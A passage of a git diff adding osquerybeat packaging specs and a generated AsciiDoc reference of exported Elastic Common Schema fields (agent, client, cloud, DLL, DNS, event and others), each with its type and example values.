+specs: + osquerybeat: + ### + # Elastic Licensed Packages + ### + - os: windows + types: [zip] + spec: + <<: *binary_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + + - os: darwin + types: [tgz] + spec: + <<: *binary_spec + <<: *elastic_license_for_binaries + + - os: linux + types: [tgz] + spec: + <<: *binary_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} diff --git a/x-pack/osquerybeat/docs/fields.asciidoc b/x-pack/osquerybeat/docs/fields.asciidoc new file mode 100644 index 00000000000..1bc25613d7d --- /dev/null +++ b/x-pack/osquerybeat/docs/fields.asciidoc 
@@ -0,0 +1,9762 @@ + +//// +This file is generated! See _meta/fields.yml and scripts/generate_fields_docs.py +//// + +[[exported-fields]] += Exported fields + +[partintro] + +-- +This document describes the fields that are exported by Osquerybeat. They are +grouped in the following categories: + +* <> +* <> +* <> +* <> +* <> +* <> +* <> +* <> +* <> + +-- +[[exported-fields-beat-common]] +== Beat fields + +Contains common beat fields available in all event types. + + + +*`agent.hostname`*:: ++ +-- +Deprecated - use agent.name or agent.id to identify an agent. + + +type: alias + +alias to: agent.name + +-- + +*`beat.timezone`*:: ++ +-- +type: alias + +alias to: event.timezone + +-- + +*`fields`*:: ++ +-- +Contains user configurable fields. + + +type: object + +-- + +*`beat.name`*:: ++ +-- +type: alias + +alias to: host.name + +-- + +*`beat.hostname`*:: ++ +-- +type: alias + +alias to: agent.name + +-- + +*`timeseries.instance`*:: ++ +-- +Time series instance id + +type: keyword + +-- + +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + +[[exported-fields-cloud]] +== Cloud provider metadata fields + +Metadata from cloud providers added by the add_cloud_metadata processor. + + + +*`cloud.image.id`*:: ++ +-- +Image ID for the cloud instance. 
+ + +example: ami-abcd1234 + +-- + +*`meta.cloud.provider`*:: ++ +-- +type: alias + +alias to: cloud.provider + +-- + +*`meta.cloud.instance_id`*:: ++ +-- +type: alias + +alias to: cloud.instance.id + +-- + +*`meta.cloud.instance_name`*:: ++ +-- +type: alias + +alias to: cloud.instance.name + +-- + +*`meta.cloud.machine_type`*:: ++ +-- +type: alias + +alias to: cloud.machine.type + +-- + +*`meta.cloud.availability_zone`*:: ++ +-- +type: alias + +alias to: cloud.availability_zone + +-- + +*`meta.cloud.project_id`*:: ++ +-- +type: alias + +alias to: cloud.project.id + +-- + +*`meta.cloud.region`*:: ++ +-- +type: alias + +alias to: cloud.region + +-- + +[[exported-fields-docker-processor]] +== Docker fields + +Docker stats collected from Docker. + + + + +*`docker.container.id`*:: ++ +-- +type: alias + +alias to: container.id + +-- + +*`docker.container.image`*:: ++ +-- +type: alias + +alias to: container.image.name + +-- + +*`docker.container.name`*:: ++ +-- +type: alias + +alias to: container.name + +-- + +*`docker.container.labels`*:: ++ +-- +Image labels. + + +type: object + +-- + +[[exported-fields-ecs]] +== ECS fields + + +This section defines Elastic Common Schema (ECS) fields—a common set of fields +to be used when storing event data in {es}. + +This is an exhaustive list, and fields listed here are not necessarily used by {beatname_uc}. +The goal of ECS is to enable and encourage users of {es} to normalize their event data, +so that they can better analyze, visualize, and correlate the data represented in their events. + +See the {ecs-ref}[ECS reference] for more information. + +*`@timestamp`*:: ++ +-- +Date/time when the event originated. +This is the date/time extracted from the event, typically representing when the event was generated by the source. +If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. +Required field for all events. 
+ +type: date + +example: 2016-05-23T08:05:34.853Z + +required: True + +-- + +*`labels`*:: ++ +-- +Custom key/value pairs. +Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. +Example: `docker` and `k8s` labels. + +type: object + +example: {"application": "foo-bar", "env": "production"} + +-- + +*`message`*:: ++ +-- +For log events the message field contains the log message, optimized for viewing in a log viewer. +For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. +If multiple messages exist, they can be combined into one message. + +type: text + +example: Hello World + +-- + +*`tags`*:: ++ +-- +List of keywords used to tag each event. + +type: keyword + +example: ["production", "env2"] + +-- + +[float] +=== agent + +The agent fields contain the data about the software entity, if any, that collects, detects, or observes events on a host, or takes measurements on a host. +Examples include Beats. Agents may also run on observers. ECS agent.* fields shall be populated with details of the agent running on the host or observer where the event happened or the measurement was taken. + + +*`agent.build.original`*:: ++ +-- +Extended build information for the agent. +This field is intended to contain any build information that a data source may provide, no specific formatting is required. + +type: keyword + +example: metricbeat version 7.6.0 (amd64), libbeat 7.6.0 [6a23e8f8f30f5001ba344e4e54d8d9cb82cb107c built 2020-02-05 23:10:10 +0000 UTC] + +-- + +*`agent.ephemeral_id`*:: ++ +-- +Ephemeral identifier of this agent (if one exists). +This id normally changes across restarts, but `agent.id` does not. + +type: keyword + +example: 8a4f500f + +-- + +*`agent.id`*:: ++ +-- +Unique identifier of this agent (if one exists). +Example: For Beats this would be beat.id. 
+ +type: keyword + +example: 8a4f500d + +-- + +*`agent.name`*:: ++ +-- +Custom name of the agent. +This is a name that can be given to an agent. This can be helpful if for example two Filebeat instances are running on the same host but a human readable separation is needed on which Filebeat instance data is coming from. +If no name is given, the name is often left empty. + +type: keyword + +example: foo + +-- + +*`agent.type`*:: ++ +-- +Type of the agent. +The agent type always stays the same and should be given by the agent used. In case of Filebeat the agent would always be Filebeat also if two Filebeat instances are run on the same machine. + +type: keyword + +example: filebeat + +-- + +*`agent.version`*:: ++ +-- +Version of the agent. + +type: keyword + +example: 6.0.0-rc2 + +-- + +[float] +=== as + +An autonomous system (AS) is a collection of connected Internet Protocol (IP) routing prefixes under the control of one or more network operators on behalf of a single administrative entity or domain that presents a common, clearly defined routing policy to the internet. + + +*`as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`as.organization.name.text`*:: ++ +-- +type: text + +-- + +[float] +=== client + +A client is defined as the initiator of a network connection for events regarding sessions, connections, or bidirectional flow records. +For TCP events, the client is the initiator of the TCP connection that sends the SYN packet(s). For other protocols, the client is generally the initiator or requestor in the network transaction. Some systems use the term "originator" to refer the client in TCP connections. The client fields describe details about the system acting as the client in the network event. 
Client fields are usually populated in conjunction with server fields. Client fields are generally not populated for packet-level events. +Client / server representations can add semantic context to an exchange, which is helpful to visualize the data in certain situations. If your context falls in that category, you should still ensure that source and destination are filled appropriately. + + +*`client.address`*:: ++ +-- +Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. +Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`client.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`client.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`client.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`client.bytes`*:: ++ +-- +Bytes sent from the client to the server. + +type: long + +example: 184 + +format: bytes + +-- + +*`client.domain`*:: ++ +-- +Client domain. + +type: keyword + +-- + +*`client.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`client.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`client.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`client.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`client.geo.location`*:: ++ +-- +Longitude and latitude. 
+ +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`client.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`client.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`client.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`client.ip`*:: ++ +-- +IP address of the client (IPv4 or IPv6). + +type: ip + +-- + +*`client.mac`*:: ++ +-- +MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`client.nat.ip`*:: ++ +-- +Translated IP of source based NAT sessions (e.g. internal client to internet). +Typically connections traversing load balancers, firewalls, or routers. + +type: ip + +-- + +*`client.nat.port`*:: ++ +-- +Translated port of source based NAT sessions (e.g. internal client to internet). +Typically connections traversing load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`client.packets`*:: ++ +-- +Packets sent from the client to the server. 
+ +type: long + +example: 12 + +-- + +*`client.port`*:: ++ +-- +Port of the client. + +type: long + +format: string + +-- + +*`client.registered_domain`*:: ++ +-- +The highest registered client domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`client.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`client.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`client.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`client.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`client.user.full_name`*:: ++ +-- +User's full name, if available. 
+ +type: keyword + +example: Albert Einstein + +-- + +*`client.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`client.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`client.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`client.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`client.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`client.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`client.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`client.user.name.text`*:: ++ +-- +type: text + +-- + +*`client.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== cloud + +Fields related to the cloud or infrastructure the events are coming from. + + +*`cloud.account.id`*:: ++ +-- +The cloud account or organization id used to identify different entities in a multi-tenant environment. +Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. + +type: keyword + +example: 666777888999 + +-- + +*`cloud.account.name`*:: ++ +-- +The cloud account name or alias used to identify different entities in a multi-tenant environment. +Examples: AWS account name, Google Cloud ORG display name. + +type: keyword + +example: elastic-dev + +-- + +*`cloud.availability_zone`*:: ++ +-- +Availability zone in which this host is running. + +type: keyword + +example: us-east-1c + +-- + +*`cloud.instance.id`*:: ++ +-- +Instance ID of the host machine. 
+ +type: keyword + +example: i-1234567890abcdef0 + +-- + +*`cloud.instance.name`*:: ++ +-- +Instance name of the host machine. + +type: keyword + +-- + +*`cloud.machine.type`*:: ++ +-- +Machine type of the host machine. + +type: keyword + +example: t2.medium + +-- + +*`cloud.project.id`*:: ++ +-- +The cloud project identifier. +Examples: Google Cloud Project id, Azure Project id. + +type: keyword + +example: my-project + +-- + +*`cloud.project.name`*:: ++ +-- +The cloud project name. +Examples: Google Cloud Project name, Azure Project name. + +type: keyword + +example: my project + +-- + +*`cloud.provider`*:: ++ +-- +Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + +type: keyword + +example: aws + +-- + +*`cloud.region`*:: ++ +-- +Region in which this host is running. + +type: keyword + +example: us-east-1 + +-- + +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + +[float] +=== code_signature + +These fields contain information about binary code signatures. + + +*`code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. 
+ +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +[float] +=== container + +Container fields are used for meta information about the specific container that is the source of information. +These fields help correlate data based containers from any runtime. + + +*`container.id`*:: ++ +-- +Unique container id. + +type: keyword + +-- + +*`container.image.name`*:: ++ +-- +Name of the image the container was built on. + +type: keyword + +-- + +*`container.image.tag`*:: ++ +-- +Container image tags. + +type: keyword + +-- + +*`container.labels`*:: ++ +-- +Image labels. + +type: object + +-- + +*`container.name`*:: ++ +-- +Container name. + +type: keyword + +-- + +*`container.runtime`*:: ++ +-- +Runtime managing this container. + +type: keyword + +example: docker + +-- + +[float] +=== destination + +Destination fields capture details about the receiver of a network exchange/packet. These fields are populated from a network event, packet, or other event containing details of a network transaction. +Destination fields are usually populated in conjunction with source fields. 
The source and destination fields are considered the baseline and should always be filled if an event contains source and destination details from a network transaction. If the event also contains identification of the client and server roles, then the client and server fields should also be populated. + + +*`destination.address`*:: ++ +-- +Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. +Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`destination.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`destination.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`destination.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`destination.bytes`*:: ++ +-- +Bytes sent from the destination to the source. + +type: long + +example: 184 + +format: bytes + +-- + +*`destination.domain`*:: ++ +-- +Destination domain. + +type: keyword + +-- + +*`destination.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`destination.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`destination.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`destination.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`destination.geo.location`*:: ++ +-- +Longitude and latitude. 
+ +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`destination.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`destination.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`destination.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`destination.ip`*:: ++ +-- +IP address of the destination (IPv4 or IPv6). + +type: ip + +-- + +*`destination.mac`*:: ++ +-- +MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`destination.nat.ip`*:: ++ +-- +Translated ip of destination based NAT sessions (e.g. internet to private DMZ) +Typically used with load balancers, firewalls, or routers. + +type: ip + +-- + +*`destination.nat.port`*:: ++ +-- +Port the source session is translated to by NAT Device. +Typically used with load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`destination.packets`*:: ++ +-- +Packets sent from the destination to the source. 
+ +type: long + +example: 12 + +-- + +*`destination.port`*:: ++ +-- +Port of the destination. + +type: long + +format: string + +-- + +*`destination.registered_domain`*:: ++ +-- +The highest registered destination domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`destination.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`destination.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`destination.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`destination.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`destination.user.full_name`*:: ++ +-- +User's full name, if available. 
+ +type: keyword + +example: Albert Einstein + +-- + +*`destination.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`destination.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`destination.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`destination.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`destination.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`destination.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`destination.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`destination.user.name.text`*:: ++ +-- +type: text + +-- + +*`destination.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== dll + +These fields contain information about code libraries dynamically loaded into processes. + +Many operating systems refer to "shared code libraries" with different names, but this field set refers to all of the following: +* Dynamic-link library (`.dll`) commonly used on Windows +* Shared Object (`.so`) commonly used on Unix-like operating systems +* Dynamic library (`.dylib`) commonly used on macOS + + +*`dll.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. 
+ +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`dll.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`dll.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`dll.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`dll.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`dll.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`dll.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`dll.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`dll.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`dll.name`*:: ++ +-- +Name of the library. +This generally maps to the name of the file on disk. + +type: keyword + +example: kernel32.dll + +-- + +*`dll.path`*:: ++ +-- +Full file path of the library. + +type: keyword + +example: C:\Windows\System32\kernel32.dll + +-- + +*`dll.pe.architecture`*:: ++ +-- +CPU architecture target for the file. 
+ +type: keyword + +example: x64 + +-- + +*`dll.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`dll.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`dll.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`dll.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`dll.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`dll.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +[float] +=== dns + +Fields describing DNS queries and answers. +DNS events should either represent a single DNS query prior to getting answers (`dns.type:query`) or they should represent a full exchange and contain the query details as well as all of the answers that were provided for this query (`dns.type:answer`). + + +*`dns.answers`*:: ++ +-- +An array containing an object for each answer section returned by the server. +The main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines. +Not all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. 
If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields. + +type: object + +-- + +*`dns.answers.class`*:: ++ +-- +The class of DNS data contained in this resource record. + +type: keyword + +example: IN + +-- + +*`dns.answers.data`*:: ++ +-- +The data describing the resource. +The meaning of this data depends on the type and class of the resource record. + +type: keyword + +example: 10.10.10.10 + +-- + +*`dns.answers.name`*:: ++ +-- +The domain name to which this resource record pertains. +If a chain of CNAME is being resolved, each answer's `name` should be the one that corresponds with the answer's `data`. It should not simply be the original `question.name` repeated. + +type: keyword + +example: www.example.com + +-- + +*`dns.answers.ttl`*:: ++ +-- +The time interval in seconds that this resource record may be cached before it should be discarded. Zero values mean that the data should not be cached. + +type: long + +example: 180 + +-- + +*`dns.answers.type`*:: ++ +-- +The type of data contained in this resource record. + +type: keyword + +example: CNAME + +-- + +*`dns.header_flags`*:: ++ +-- +Array of 2 letter DNS header flags. +Expected values are: AA, TC, RD, RA, AD, CD, DO. + +type: keyword + +example: ["RD", "RA"] + +-- + +*`dns.id`*:: ++ +-- +The DNS packet identifier assigned by the program that generated the query. The identifier is copied to the response. + +type: keyword + +example: 62111 + +-- + +*`dns.op_code`*:: ++ +-- +The DNS operation code that specifies the kind of query in the message. This value is set by the originator of a query and copied into the response. + +type: keyword + +example: QUERY + +-- + +*`dns.question.class`*:: ++ +-- +The class of records being queried. + +type: keyword + +example: IN + +-- + +*`dns.question.name`*:: ++ +-- +The name being queried. 
+If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. + +type: keyword + +example: www.example.com + +-- + +*`dns.question.registered_domain`*:: ++ +-- +The highest registered domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`dns.question.subdomain`*:: ++ +-- +The subdomain is all of the labels under the registered_domain. +If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: www + +-- + +*`dns.question.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`dns.question.type`*:: ++ +-- +The type of record being queried. + +type: keyword + +example: AAAA + +-- + +*`dns.resolved_ip`*:: ++ +-- +Array containing all IPs seen in `answers.data`. +The `answers` array can be difficult to use, because of the variety of data formats it can contain. 
Extracting all IP addresses seen in there to `dns.resolved_ip` makes it possible to index them as IP addresses, and makes them easier to visualize and query for. + +type: ip + +example: ["10.10.10.10", "10.10.10.11"] + +-- + +*`dns.response_code`*:: ++ +-- +The DNS response code. + +type: keyword + +example: NOERROR + +-- + +*`dns.type`*:: ++ +-- +The type of DNS event captured, query or answer. +If your source of DNS events only gives you DNS queries, you should only create dns events of type `dns.type:query`. +If your source of DNS events gives you answers as well, you should create one event per query (optionally as soon as the query is seen). And a second event containing all query details as well as an array of answers. + +type: keyword + +example: answer + +-- + +[float] +=== ecs + +Meta-information specific to ECS. + + +*`ecs.version`*:: ++ +-- +ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. +When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. + +type: keyword + +example: 1.0.0 + +required: True + +-- + +[float] +=== error + +These fields can represent errors of any kind. +Use them for errors that happen while fetching events or in cases where the event itself contains an error. + + +*`error.code`*:: ++ +-- +Error code describing the error. + +type: keyword + +-- + +*`error.id`*:: ++ +-- +Unique identifier for the error. + +type: keyword + +-- + +*`error.message`*:: ++ +-- +Error message. + +type: text + +-- + +*`error.stack_trace`*:: ++ +-- +The stack trace of this error in plain text. + +type: keyword + +Field is not indexed. + +-- + +*`error.stack_trace.text`*:: ++ +-- +type: text + +-- + +*`error.type`*:: ++ +-- +The type of the error, for example the class name of the exception. 
+ +type: keyword + +example: java.lang.NullPointerException + +-- + +[float] +=== event + +The event fields are used for context information about the log or metric event itself. +A log is defined as an event containing details of something that happened. Log events must include the time at which the thing happened. Examples of log events include a process starting on a host, a network packet being sent from a source to a destination, or a network connection between a client and a server being initiated or closed. A metric is defined as an event containing one or more numerical measurements and the time at which the measurement was taken. Examples of metric events include memory pressure measured on a host and device temperature. See the `event.kind` definition in this section for additional details about metric and state events. + + +*`event.action`*:: ++ +-- +The action captured by the event. +This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. + +type: keyword + +example: user-password-change + +-- + +*`event.category`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. +`event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. +This field is an array. This will allow proper categorization of some events that fall in multiple categories. + +type: keyword + +example: authentication + +-- + +*`event.code`*:: ++ +-- +Identification code for this event, 